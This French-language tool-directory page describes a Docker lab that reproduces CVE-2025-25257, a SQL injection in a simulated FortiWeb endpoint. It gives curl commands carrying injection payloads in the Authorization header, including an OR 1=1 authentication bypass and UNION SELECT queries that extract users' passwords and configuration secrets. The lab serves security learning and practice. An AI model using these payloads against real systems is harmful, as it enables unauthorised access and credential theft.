Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-25257 — Reproductible laboratoire Docker pour CVE-2025-25257, démontrant un contournement d'injection SQL et une exfiltration de données via l'en-tête HTTP Authorization sur un point de terminaison FortiWeb simulé. | Kitploit
Outils/GitHubGitHub/lytianahkone-boop/cve-2025-25257
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationSécurité des Bases de DonnéesLabs et Pratique
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

Reproductible laboratoire Docker pour CVE-2025-25257, démontrant un contournement d'injection SQL et une exfiltration de données via l'en-tête HTTP Authorization sur un point de terminaison FortiWeb simulé.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-25257 - Environnement d'Expérimentation

Architecture de l'Expérimentation (l'environnement simule les composants vulnérables de FortiWeb)

root@kitploit:~
Endpoint vulnérable : /api/system/fabric/config
Vecteur d'injection : Header HTTP Authorization: Bearer
Mécanisme : Concaténation SQL directe (f-string Python)
Authentification : Aucune (bypass total)
Base de données : SQLite (pour démonstration)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : service http vulnérable volontairement / expose une API exploitable sans authentification

docker-compose.yml : orchestre un service vulnérable reproductible / expose l’API attaquable via http / isole l’environnement d’expérimentation

requirements.txt : assure un environnement stable et reproductible

app.py : implémente un endpoint pré-authentification / accepte une entrée utilisateur via Authorization/ concatène cette entrée dans une requête SQL / permet le bypass d’authentification et l’extraction de données

init_db.py : prépare un jeu de données exploitable / permet une démonstration claire du bypass d’authentification et de l’exfiltration de données

payload.txt fournit une preuve minimale, contrôlée et observable d’exécution de code

Étape 1 : Construire et lancer le conteneur

Construction de l'image Docker

docker-compose build

Démarrage du conteneur

docker-compose up -d

Vérifier que le conteneur est actif

docker-compose ps

Consulter les logs

docker-compose logs -f

Étape 2 : Vérifier l'accessibilité du service

curl http://localhost:8080/api/system/status

Étape 3 : Exploitation de la vulnérabilité

Requête non malveillante

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

Injection requête SQL malveillante Bypass avec OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

Extraction de données avec injection UNION-SELECT

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

Exfiltration des données sensibles

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

Étape 4 : Nettoyage et Arrêt

Arrêter le conteneur

docker-compose down

Supprimer les volumes

docker-compose down -v

Supprimer l'image

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

Télécharger l’outil